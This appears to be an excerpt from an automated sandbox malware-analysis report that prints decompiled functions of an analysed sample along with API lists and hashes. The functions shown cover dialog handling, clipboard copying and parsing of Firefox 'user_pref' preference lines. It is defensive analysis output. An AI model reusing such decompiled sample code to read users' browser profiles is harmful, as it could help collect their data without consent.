				_t126 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
					L7:
					if(_t126 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
						}
						if(_a8 == 0x3ec) {
							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
						}
						if(_a8 == 0x3ee) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t155 + 4), 2);
						}
						if(_a8 == 1) {
							E00405538(_t155);
							EndDialog( *(_t155 + 4), 1);
						}
						_t75 = 1;
						goto L28;
					}
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
					_t129 = 0;
					if(_t128 <= 0) {
						L12:
						E0040559F(_t155);
						goto L13;
					}
					_t144 = 0;
					do {
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
						 *(_t118 + 2) = _t129;
						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
						_t129 = _t129 + 1;
						_t144 = _t144 + 0x14;
						 *_t118 = _t153;
					} while (_t129 < _t128);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004054C6(__ecx, __ecx);
						goto L7;
					}
				}
			}





















                                                                                                                                                    0x00405715
                                                                                                                                                    0x0040571b
                                                                                                                                                    0x0040571f
                                                                                                                                                    0x00405725
                                                                                                                                                    0x00405727
                                                                                                                                                    0x0040585b
                                                                                                                                                    0x0040585e
                                                                                                                                                    0x00405867
                                                                                                                                                    0x00405869
                                                                                                                                                    0x0040586c
                                                                                                                                                    0x00405873
                                                                                                                                                    0x00405879
                                                                                                                                                    0x0040586c
                                                                                                                                                    0x0040587a
                                                                                                                                                    0x0040587e
                                                                                                                                                    0x00405850
                                                                                                                                                    0x00405850
                                                                                                                                                    0x00405850
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405880
                                                                                                                                                    0x00405880
                                                                                                                                                    0x00405883
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405885
                                                                                                                                                    0x00405888
                                                                                                                                                    0x0040588f
                                                                                                                                                    0x00405897
                                                                                                                                                    0x0040589a
                                                                                                                                                    0x0040589c
                                                                                                                                                    0x0040589e
                                                                                                                                                    0x004058ed
                                                                                                                                                    0x004058ed
                                                                                                                                                    0x004058f1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004058f7
                                                                                                                                                    0x004058fb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405905
                                                                                                                                                    0x00405913
                                                                                                                                                    0x00405921
                                                                                                                                                    0x0040592f
                                                                                                                                                    0x0040594d
                                                                                                                                                    0x00405950
                                                                                                                                                    0x00405956
                                                                                                                                                    0x00405959
                                                                                                                                                    0x00405852
                                                                                                                                                    0x00405858
                                                                                                                                                    0x00405858
                                                                                                                                                    0x004058a0
                                                                                                                                                    0x004058aa
                                                                                                                                                    0x004058b2
                                                                                                                                                    0x004058b4
                                                                                                                                                    0x004058b6
                                                                                                                                                    0x004058ba
                                                                                                                                                    0x004058c2
                                                                                                                                                    0x004058ce
                                                                                                                                                    0x004058dd
                                                                                                                                                    0x004058e8
                                                                                                                                                    0x004058e8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004058b4
                                                                                                                                                    0x00405891
                                                                                                                                                    0x00405895
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405895
                                                                                                                                                    0x0040587e
                                                                                                                                                    0x0040572d
                                                                                                                                                    0x00405732
                                                                                                                                                    0x00405844
                                                                                                                                                    0x0040584b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040584b
                                                                                                                                                    0x00405738
                                                                                                                                                    0x00405739
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405742
                                                                                                                                                    0x00405748
                                                                                                                                                    0x00405762
                                                                                                                                                    0x00405765
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405771
                                                                                                                                                    0x004057a6
                                                                                                                                                    0x004057b7
                                                                                                                                                    0x004057bf
                                                                                                                                                    0x004057bf
                                                                                                                                                    0x004057ca
                                                                                                                                                    0x004057d2
                                                                                                                                                    0x004057d2
                                                                                                                                                    0x004057dd
                                                                                                                                                    0x004057e8
                                                                                                                                                    0x004057ee
                                                                                                                                                    0x004057f5
                                                                                                                                                    0x00405800
                                                                                                                                                    0x00405806
                                                                                                                                                    0x00405812
                                                                                                                                                    0x00405819
                                                                                                                                                    0x00405819
                                                                                                                                                    0x00405820
                                                                                                                                                    0x00405822
                                                                                                                                                    0x0040582c
                                                                                                                                                    0x0040582c
                                                                                                                                                    0x00405830
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405830
                                                                                                                                                    0x00405776
                                                                                                                                                    0x00405779
                                                                                                                                                    0x0040577d
                                                                                                                                                    0x004057a0
                                                                                                                                                    0x004057a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004057a1
                                                                                                                                                    0x0040577f
                                                                                                                                                    0x00405781
                                                                                                                                                    0x00405786
                                                                                                                                                    0x00405789
                                                                                                                                                    0x00405790
                                                                                                                                                    0x00405795
                                                                                                                                                    0x00405796
                                                                                                                                                    0x0040579b
                                                                                                                                                    0x0040579b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00405751
                                                                                                                                                    0x00405757
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040575d
                                                                                                                                                    0x0040575d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040575d
                                                                                                                                                    0x00405757

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057BD
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057D0
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057E5
                                                                                                                                                    • GetDlgItem.USER32 ref: 004057FD
                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405819
                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                                                                                                      • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                                                                                                                      • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                                                                                                      • Part of subcall function 004054C6: SendMessageA.USER32 ref: 00405505
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2485852401-0
                                                                                                                                                    • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                                                                                    • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                                                                                                                    • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                                                                                    • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405960 Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                    			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L004115D6();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E004049FB(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L004115D0();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L004115D0();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E00401540(0x448, _t80, _a4) == 1) {
					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L004115D6();
				}
				return _t47;
			}


















                                                                                                                                                    0x00405960
                                                                                                                                                    0x00405964
                                                                                                                                                    0x00405969
                                                                                                                                                    0x0040596b
                                                                                                                                                    0x0040596e
                                                                                                                                                    0x00405971
                                                                                                                                                    0x00405979
                                                                                                                                                    0x00405981
                                                                                                                                                    0x0040597b
                                                                                                                                                    0x0040597b
                                                                                                                                                    0x0040597d
                                                                                                                                                    0x0040597d
                                                                                                                                                    0x00405983
                                                                                                                                                    0x00405986
                                                                                                                                                    0x00405988
                                                                                                                                                    0x0040598a
                                                                                                                                                    0x0040598c
                                                                                                                                                    0x0040598d
                                                                                                                                                    0x00405993
                                                                                                                                                    0x00405993
                                                                                                                                                    0x00405999
                                                                                                                                                    0x0040599c
                                                                                                                                                    0x004059a6
                                                                                                                                                    0x004059a7
                                                                                                                                                    0x004059aa
                                                                                                                                                    0x004059b3
                                                                                                                                                    0x004059b4
                                                                                                                                                    0x004059c3
                                                                                                                                                    0x004059c5
                                                                                                                                                    0x004059d3
                                                                                                                                                    0x004059d8
                                                                                                                                                    0x004059db
                                                                                                                                                    0x004059e0
                                                                                                                                                    0x004059e7
                                                                                                                                                    0x004059ea
                                                                                                                                                    0x004059f3
                                                                                                                                                    0x004059f4
                                                                                                                                                    0x004059fc
                                                                                                                                                    0x004059ff
                                                                                                                                                    0x00405a01
                                                                                                                                                    0x00405a03
                                                                                                                                                    0x00405a06
                                                                                                                                                    0x00405a0e
                                                                                                                                                    0x00405a11
                                                                                                                                                    0x00405a11
                                                                                                                                                    0x00405a03
                                                                                                                                                    0x00405a14
                                                                                                                                                    0x00405a14
                                                                                                                                                    0x00405a2c
                                                                                                                                                    0x00405a34
                                                                                                                                                    0x00405a41
                                                                                                                                                    0x00405a41
                                                                                                                                                    0x00405a4a
                                                                                                                                                    0x00405a53
                                                                                                                                                    0x00405a55
                                                                                                                                                    0x00405a58
                                                                                                                                                    0x00405a5d
                                                                                                                                                    0x00405a61

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                    • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                                                                                    • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                                                                                                    • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                                                                                    • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A698 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040A698(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                                                                                                                                    0x0040a6a5
                                                                                                                                                    0x0040a6b7
                                                                                                                                                    0x0040a6cd
                                                                                                                                                    0x0040a6df
                                                                                                                                                    0x0040a6e0
                                                                                                                                                    0x0040a6ee
                                                                                                                                                    0x0040a6f9
                                                                                                                                                    0x0040a6fa
                                                                                                                                                    0x0040a709
                                                                                                                                                    0x0040a71a
                                                                                                                                                    0x0040a73a
                                                                                                                                                    0x0040a761
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a771
                                                                                                                                                    0x0040a773

                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32 ref: 0040A6B7
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A6CD
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A6E0
                                                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                    • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                                                                                    • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                                                                                                    • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                                                                                    • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00406069 Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                    			E00406069(void* _a4) {
				signed int _t11;
				int _t13;
				void* _t17;
				signed int _t19;
				void* _t22;

				_t22 = _a4;
				_t19 = 0;
				EmptyClipboard();
				if(_t22 != 0) {
					_t2 = strlen(_t22) + 1; // 0x1
					_t13 = _t2;
					_t17 = GlobalAlloc(0x2000, _t13);
					if(_t17 != 0) {
						memcpy(GlobalLock(_t17), _t22, _t13);
						GlobalUnlock(_t17);
						_t11 = SetClipboardData(1, _t17);
						asm("sbb esi, esi");
						_t19 =  ~( ~_t11);
					}
				}
				CloseClipboard();
				return _t19;
			}








                                                                                                                                                    0x0040606a
                                                                                                                                                    0x0040606f
                                                                                                                                                    0x00406071
                                                                                                                                                    0x00406079
                                                                                                                                                    0x00406084
                                                                                                                                                    0x00406084
                                                                                                                                                    0x00406093
                                                                                                                                                    0x00406097
                                                                                                                                                    0x004060a3
                                                                                                                                                    0x004060ac
                                                                                                                                                    0x004060b5
                                                                                                                                                    0x004060bf
                                                                                                                                                    0x004060c1
                                                                                                                                                    0x004060c1
                                                                                                                                                    0x004060c4
                                                                                                                                                    0x004060c5
                                                                                                                                                    0x004060cf

                                                                                                                                                    APIs
                                                                                                                                                    • EmptyClipboard.USER32(?,?,0040AEA7,?), ref: 00406071
                                                                                                                                                    • strlen.MSVCRT ref: 0040607E
                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 0040609A
                                                                                                                                                    • memcpy.MSVCRT ref: 004060A3
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                                                                                                    • SetClipboardData.USER32 ref: 004060B5
                                                                                                                                                    • CloseClipboard.USER32(?,?,0040AEA7,?), ref: 004060C5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3116012682-0
                                                                                                                                                    • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                                                                                    • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                                                                                                    • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                                                                                    • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C530 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0040C530(void* __eflags, intOrPtr* _a4) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				void _v1029;
				void _v1039;
				char _v1040;
				void _v2063;
				void _v2064;
				void _v3087;
				void _v3088;
				void* __ebx;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t67;
				void* _t68;
				void* _t73;
				void* _t85;
				int _t86;
				void* _t106;
				int _t107;
				int _t111;
				void* _t114;
				void* _t115;
				void* _t116;

				_v1040 = 0;
				memset( &_v1039, 0, 0x3ff);
				_v3088 = 0;
				memset( &_v3087, 0, 0x3ff);
				_v2064 = 0;
				memset( &_v2063, 0, 0x3ff);
				_t116 = _t115 + 0x24;
				_t53 = E00406B74(_a4 + 4);
				_v12 = 0;
				_v16 = _t53;
				_t54 = E00406900(_t53,  &_v1040,  &_v1040,  &_v12);
				if(_t54 != 0) {
					do {
						_t56 = E004069D2(0, "user_pref(\"");
						_pop(_t92);
						if(_t56 != 0) {
							goto L10;
						}
						_push(0x412b10);
						_t60 = 0xb;
						_t14 = E004069D2(_t60) - 0xb; // -11
						_t92 = _t14;
						_v8 = _t92;
						if(_t92 <= 0) {
							goto L10;
						}
						_t85 = E004069D2(_t61 + 1, 0x412b18);
						_t17 = _t85 + 1; // 0x1
						_t106 = E004069D2(_t17, 0x412b10);
						if(_t106 <= 0) {
							_t28 = _t85 + 1; // 0x1
							_t67 = E004069D2(_t28, ")");
							_pop(_t92);
							_t68 = 0xfffffffe;
							_t111 = _t67 + _t68 - _t85;
							if(_t111 <= 0) {
								goto L10;
							}
							_t107 = _v8;
							memcpy( &_v3088,  &_v1029, _t107);
							 *((char*)(_t114 + _t107 - 0xc0c)) = 0;
							_t73 = _t114 + _t85 - 0x40a;
							L9:
							memcpy( &_v2064, _t73, _t111);
							_t92 = _a4;
							_t116 = _t116 + 0x18;
							 *((char*)(_t114 + _t111 - 0x80c)) = 0;
							_t59 =  *((intOrPtr*)( *_a4))( &_v3088,  &_v2064);
							if(_t59 == 0) {
								break;
							}
							goto L10;
						}
						_t20 = _t106 + 1; // 0x1
						_t111 = E004069D2(_t20, 0x412b10) - _t106 - 1;
						_pop(_t92);
						if(_t111 <= 0) {
							goto L10;
						}
						_t86 = _v8;
						memcpy( &_v3088,  &_v1029, _t86);
						 *((char*)(_t114 + _t86 - 0xc0c)) = 0;
						_t73 = _t114 + _t106 - 0x40b;
						goto L9;
						L10:
						_t59 = E00406900(_v16, _t92,  &_v1040,  &_v12);
					} while (_t59 != 0);
					return _t59;
				}
				return _t54;
			}






























                                                                                                                                                    0x0040c54b
                                                                                                                                                    0x0040c551
                                                                                                                                                    0x0040c55f
                                                                                                                                                    0x0040c565
                                                                                                                                                    0x0040c573
                                                                                                                                                    0x0040c579
                                                                                                                                                    0x0040c581
                                                                                                                                                    0x0040c587
                                                                                                                                                    0x0040c596
                                                                                                                                                    0x0040c59c
                                                                                                                                                    0x0040c59f
                                                                                                                                                    0x0040c5a8
                                                                                                                                                    0x0040c5af
                                                                                                                                                    0x0040c5bc
                                                                                                                                                    0x0040c5c3
                                                                                                                                                    0x0040c5c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040c5cf
                                                                                                                                                    0x0040c5d2
                                                                                                                                                    0x0040c5df
                                                                                                                                                    0x0040c5df
                                                                                                                                                    0x0040c5e4
                                                                                                                                                    0x0040c5e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040c5fe
                                                                                                                                                    0x0040c600
                                                                                                                                                    0x0040c610
                                                                                                                                                    0x0040c61b
                                                                                                                                                    0x0040c661
                                                                                                                                                    0x0040c664
                                                                                                                                                    0x0040c669
                                                                                                                                                    0x0040c66e
                                                                                                                                                    0x0040c671
                                                                                                                                                    0x0040c675
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040c677
                                                                                                                                                    0x0040c689
                                                                                                                                                    0x0040c68e
                                                                                                                                                    0x0040c696
                                                                                                                                                    0x0040c69d
                                                                                                                                                    0x0040c6a6
                                                                                                                                                    0x0040c6ab
                                                                                                                                                    0x0040c6b0
                                                                                                                                                    0x0040c6c1
                                                                                                                                                    0x0040c6c9
                                                                                                                                                    0x0040c6cd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040c6cd
                                                                                                                                                    0x0040c61d
                                                                                                                                                    0x0040c62a
                                                                                                                                                    0x0040c62d
                                                                                                                                                    0x0040c62e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040c634
                                                                                                                                                    0x0040c646
                                                                                                                                                    0x0040c64b
                                                                                                                                                    0x0040c653
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040c6cf
                                                                                                                                                    0x0040c6dd
                                                                                                                                                    0x0040c6e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040c6ec
                                                                                                                                                    0x0040c6f0

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                    • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                                                                                    • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                                                                                                    • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                                                                                    • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040559F Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                    			E0040559F(intOrPtr _a4) {
				struct HWND__* _v12;
				signed int _v16;
				int _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				int _v48;
				char* _v52;
				void* _v64;
				void _v319;
				char _v320;
				struct HWND__* _t53;
				intOrPtr* _t59;
				void* _t61;
				intOrPtr _t66;
				void* _t74;
				void* _t80;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t89;
				short _t91;
				signed int _t94;
				short* _t95;
				void* _t96;
				void* _t97;

				_t89 = _a4;
				_t53 = GetDlgItem( *(_t89 + 4), 0x3e9);
				_v12 = _t53;
				SendMessageA(_t53, 0x1009, 0, 0);
				SendMessageA(_v12, 0x1036, 0, 0x26);
				do {
				} while (SendMessageA(_v12, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v12);
				_t80 = 6;
				E00404925(0x412466, _t80);
				_t59 =  *((intOrPtr*)(_t89 + 0xc));
				_t81 =  *((intOrPtr*)(_t59 + 4));
				_t97 = _t96 + 0x10;
				_v32 = _t81;
				_v28 =  *_t59;
				_v20 = 0;
				if(_t81 <= 0) {
					L10:
					_t61 = 2;
					E004048B6(_t61, _v12, 0, _t61);
					return SetFocus(_v12);
				} else {
					goto L3;
				}
				do {
					L3:
					_v16 = 0;
					_v24 = 0;
					do {
						_t94 = _v16 << 2;
						if( *((short*)(_v28 + _t94 + 2)) == _v20) {
							_v320 = 0;
							memset( &_v319, 0, 0xff);
							_t97 = _t97 + 0xc;
							_v52 =  &_v320;
							_v64 = 4;
							_v48 = 0xff;
							if(SendMessageA( *( *((intOrPtr*)(_a4 + 0xc)) + 8), 0x1019, _v16,  &_v64) != 0) {
								_push(_v16);
								_push(0);
								_push(_v12);
								_t84 = 5;
								_t74 = E0040496E( &_v320, _t84);
								_t95 = _t94 + _v28;
								_t91 =  *_t95;
								E00404CE9(_v12, _t74, 0 | _t91 > 0x00000000);
								_t97 = _t97 + 0x18;
								if(_t91 == 0) {
									 *_t95 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + _v24 + 0xc));
								}
							}
						}
						_v16 = _v16 + 1;
						_t66 = _v32;
						_v24 = _v24 + 0x14;
					} while (_v16 < _t66);
